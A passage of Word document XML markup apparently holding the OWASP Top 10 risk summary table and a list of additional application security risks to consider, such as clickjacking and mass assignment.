          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="3A70D7A3">
          <v:shape id="wondershare_504" o:spid="_x0000_s2053" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:169.15pt;margin-top:220.35pt;width:343.3pt;height:32.15pt;z-index:-251594240;mso-position-horizontal-relative:page;mso-position-vertical-relative:page" filled="f" stroked="f">
            <v:textbox inset="0,0,0,0">
              <w:txbxContent>
                <w:p w14:paraId="3C76AED9" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                  <w:pPr>
                    <w:tabs>
                      <w:tab w:val="left" w:pos="4969"/>
                    </w:tabs>
                    <w:autoSpaceDE w:val="0"/>
                    <w:autoSpaceDN w:val="0"/>
                    <w:adjustRightInd w:val="0"/>
                    <w:spacing w:after="0" w:line="344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274221"/>
                      <w:sz w:val="18"/>
                    </w:rPr>
                    <w:t>Vectors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Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                      <w:b/>
                      <w:noProof/>
                      <w:color w:val="274221"/>
                      <w:sz w:val="18"/>
                    </w:rPr>
                    <w:t>Technica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160D48CE">
          <v:shape id="wondershare_479" o:spid="_x0000_s2052" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:298.3pt;margin-top:229.05pt;width:98pt;height:24pt;z-index:-251593216;mso-position-horizontal-relative:page;mso-position-vertical-relative:page" filled="f" stroked="f">
            <v:textbox inset="0,0,0,0">
              <w:txbxContent>
                <w:p w14:paraId="21DE0947" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                  <w:pPr>
                    <w:autoSpaceDE w:val="0"/>
                    <w:autoSpaceDN w:val="0"/>
                    <w:adjustRightInd w:val="0"/>
                    <w:spacing w:after="0" w:line="180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274221"/>
                      <w:sz w:val="18"/>
                    </w:rPr>
                    <w:t>Weakness</w:t>
                  </w:r>
                </w:p>
              </w:txbxContent>
            </v:textbox>
            <w10:wrap anchorx="page" anchory="page"/>
          </v:shape>
        </w:pict>
      </w:r>
      <w:r w:rsidR="00810992">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="98"/>
          <w:sz w:val="31"/>
        </w:rPr>
        <w:t>RISK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F0AA977" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="497"/>
      </w:pPr>
      <w:r w:rsidRPr="00B3349A">
        <w:br w:type="column"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="6714077B" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="497"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="066FDDF1" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="497"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0CA21B61" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="497"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="42010DE3" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:firstLine="12"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:noProof/>
          <w:color w:val="274221"/>
          <w:w w:val="96"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Threat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D7E9967" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="161" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:noProof/>
          <w:color w:val="274221"/>
          <w:w w:val="96"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Agents</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CCFD963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0CD3840F" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="297DE5CE" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5DE5C5B5" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="214" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:noProof/>
          <w:color w:val="274221"/>
          <w:w w:val="94"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Attack</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="94"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>                                                     </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:noProof/>
          <w:color w:val="274221"/>
          <w:w w:val="94"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Security</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52DEA198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41EA3330" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="50BA92A7" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2098DED2" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="23A8E313" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="232" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:noProof/>
          <w:color w:val="274221"/>
          <w:w w:val="92"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Impacts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="211C2001" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
      </w:pPr>
      <w:r w:rsidRPr="00B3349A">
        <w:br w:type="column"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F048082" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7AC2D344" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F2FC1F4" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="202" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:noProof/>
          <w:color w:val="274221"/>
          <w:w w:val="90"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Business</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06307700" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="216" w:lineRule="exact"/>
        <w:ind w:firstLine="26"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:noProof/>
          <w:color w:val="274221"/>
          <w:w w:val="90"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Impacts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C51E7D0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num="5" w:space="720" w:equalWidth="0">
            <w:col w:w="1782" w:space="0"/>
            <w:col w:w="1601" w:space="0"/>
            <w:col w:w="5048" w:space="0"/>
            <w:col w:w="1399" w:space="0"/>
            <w:col w:w="970" w:space="0"/>
          </w:cols>
          <w:docGrid w:type="lines" w:linePitch="312"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D36BB81" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00164FC4" w:rsidP="00F13059">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="8465"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="181" w:lineRule="exact"/>
        <w:ind w:left="72" w:firstLine="3037"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:pict w14:anchorId="16AED058">
          <v:shape id="wondershare_464" o:spid="_x0000_s2051" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:245.45pt;margin-top:248.65pt;width:191.95pt;height:24pt;z-index:-251592192;mso-position-horizontal-relative:page;mso-position-vertical-relative:page" filled="f" stroked="f">
            <v:textbox inset="0,0,0,0">
              <w:txbxContent>
                <w:p w14:paraId="26364091" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                  <w:pPr>
                    <w:tabs>
                      <w:tab w:val="left" w:pos="1683"/>
                    </w:tabs>
                    <w:autoSpaceDE w:val="0"/>
                    <w:autoSpaceDN w:val="0"/>
                    <w:adjustRightInd w:val="0"/>
                    <w:spacing w:after="0" w:line="180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000000"/>
                      <w:sz w:val="18"/>
                    </w:rPr>
                    <w:t>Prevalence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ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                      <w:b/>
                      <w:noProof/>
                      <w:color w:val="000000"/>
                      <w:sz w:val="18"/>
                    </w:rPr>
                    <w:t>Detectability</w:t>
                  </w:r>
                </w:p>
              </w:txbxContent>
            </v:textbox>
            <w10:wrap anchorx="page" anchory="page"/>
          </v:shape>
        </w:pict>
      </w:r>
      <w:r w:rsidR="00810992">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="98"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Exploitability</w:t>
      </w:r>
      <w:r w:rsidR="00810992">
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00810992">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="98"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Impact</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77C40C64" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="72" w:firstLine="3037"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="371C51F0" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1649"/>
          <w:tab w:val="left" w:pos="3376"/>
          <w:tab w:val="left" w:pos="4886"/>
          <w:tab w:val="left" w:pos="6653"/>
          <w:tab w:val="left" w:pos="8414"/>
          <w:tab w:val="left" w:pos="9675"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="204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1-Injecti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COMM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SEVER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54803688" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="72"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="55B8F125" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3189"/>
          <w:tab w:val="left" w:pos="4762"/>
          <w:tab w:val="left" w:pos="6653"/>
          <w:tab w:val="left" w:pos="8414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2-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="98"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Authentication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   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WIDESPREAD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SEVER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33080E4E" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="72"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="57199576" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1649"/>
          <w:tab w:val="left" w:pos="3189"/>
          <w:tab w:val="left" w:pos="4522"/>
          <w:tab w:val="left" w:pos="6840"/>
          <w:tab w:val="left" w:pos="8242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3-XSS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VERY WIDESPREAD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ODERAT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0B87A284" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="72"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D7262D7" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3376"/>
          <w:tab w:val="left" w:pos="4886"/>
          <w:tab w:val="left" w:pos="6840"/>
          <w:tab w:val="left" w:pos="8242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4-Insecure DOR    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COMM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ODERAT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5846B77B" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="72"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2BF9E0BF" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1649"/>
          <w:tab w:val="left" w:pos="3376"/>
          <w:tab w:val="left" w:pos="4886"/>
          <w:tab w:val="left" w:pos="6840"/>
          <w:tab w:val="left" w:pos="8242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5-Misconfig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COMM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ODERAT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2C2FCAEA" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="72"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="40885072" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1649"/>
          <w:tab w:val="left" w:pos="3168"/>
          <w:tab w:val="left" w:pos="4754"/>
          <w:tab w:val="left" w:pos="6653"/>
          <w:tab w:val="left" w:pos="8414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6-Sens. Data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DIFFICULT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UNCOMM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SEVER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4882EC4C" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="72"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="61AFF301" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3376"/>
          <w:tab w:val="left" w:pos="4886"/>
          <w:tab w:val="left" w:pos="6653"/>
          <w:tab w:val="left" w:pos="8242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7-Function Acc.    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COMM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ODERAT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360A4D92" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="72"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="444EBC92" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1649"/>
          <w:tab w:val="left" w:pos="3189"/>
          <w:tab w:val="left" w:pos="4886"/>
          <w:tab w:val="left" w:pos="6840"/>
          <w:tab w:val="left" w:pos="8242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8-CSRF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COMM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ODERAT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1BA50169" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="72"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2433E0DA" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3189"/>
          <w:tab w:val="left" w:pos="4762"/>
          <w:tab w:val="left" w:pos="6632"/>
          <w:tab w:val="left" w:pos="8242"/>
          <w:tab w:val="left" w:pos="9675"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="262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9-Components</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="98"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>    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WIDESPREAD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DIFFICULT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ODERAT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7545DE83" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="72"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="14764732" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1649"/>
          <w:tab w:val="left" w:pos="3189"/>
          <w:tab w:val="left" w:pos="4754"/>
          <w:tab w:val="left" w:pos="6840"/>
          <w:tab w:val="left" w:pos="8242"/>
          <w:tab w:val="left" w:pos="9675"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="261" w:lineRule="exact"/>
        <w:ind w:left="72"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="98"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>A10-Redirects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VERAG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UNCOMMON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EASY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MODERATE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="98"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>App Specific</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18960988" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="72"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4EF85B01" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="441" w:lineRule="exact"/>
        <w:ind w:left="72" w:firstLine="72"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="98"/>
          <w:sz w:val="31"/>
        </w:rPr>
        <w:t>Additional Risks to Consider</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28C822D6" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="404" w:lineRule="exact"/>
        <w:ind w:left="72" w:firstLine="72"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="88"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>The Top 10 cover a lot of ground, but there are many other risks you should consider and evaluate in your organization. Some of</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20ED2DAE" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="72" w:firstLine="72"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="94"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>these have appeared in previous versions of the Top 10, and others have not, including new attack techniques that are being</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45FE400E" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="72" w:firstLine="72"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="95"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>identified all the time.  Other important application security risks (in alphabetical order) that you should also consider include:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45EC3CBE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74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Clickjacking</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="12E30ED5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749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Concurrency Flaws</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2BBCB1A2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Denial of Service</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="98"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t> (Was 2004 Top 10 – Entry 2004-A9)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00F76CCC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Expression Language Injection</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="98"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t> (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CWE-917</w:t>
      </w:r>
      <w:hyperlink r:id="rId750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)</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2F157287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7"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="97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7"/>
          <w:sz w:val="19"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Information Leakage</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="97"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t> and</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="97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7"/>
          <w:sz w:val="19"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Improper Error Handling</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="97"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t> (Was part of 2007 Top 10 –</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="97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7"/>
          <w:sz w:val="19"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Entry 2007-A6</w:t>
      </w:r>
      <w:hyperlink r:id="rId751" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
            <w:noProof/>
            <w:color w:val="000000"/>
            <w:w w:val="97"/>
            <w:sz w:val="19"/>
            <w:u w:val="none"/>
          </w:rPr>
          <w:t>)</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="64D76328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Insufficient Anti-automation</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="98"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t> (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CWE-799</w:t>
      </w:r>
      <w:hyperlink r:id="rId752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)</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3603F120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</w:rPr>
        <w:t> Insufficient Logging and Accountability (Related to 2007 Top 10 –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Entry 2007-A6</w:t>
      </w:r>
      <w:hyperlink r:id="rId753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)</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="504636E2" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="241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54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Lack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55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of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56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Intrusion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57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Detection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58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and</w:t>
        </w:r>
      </w:hyperlink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hyperlink r:id="rId759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  <w:u w:val="none"/>
          </w:rPr>
          <w:t>Response</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="30B46946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Malicious File Execution</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="98"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t> (Was 2007 Top 10 –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Entry 2007-A3</w:t>
      </w:r>
      <w:hyperlink r:id="rId760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)</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="14376EDC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000000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Mass Assignment</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="98"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t> (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="3A6331"/>
          <w:w w:val="98"/>
          <w:sz w:val="19"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>CWE-915</w:t>
      </w:r>
      <w:hyperlink r:id="rId761" w:history="1">
        <w:r>
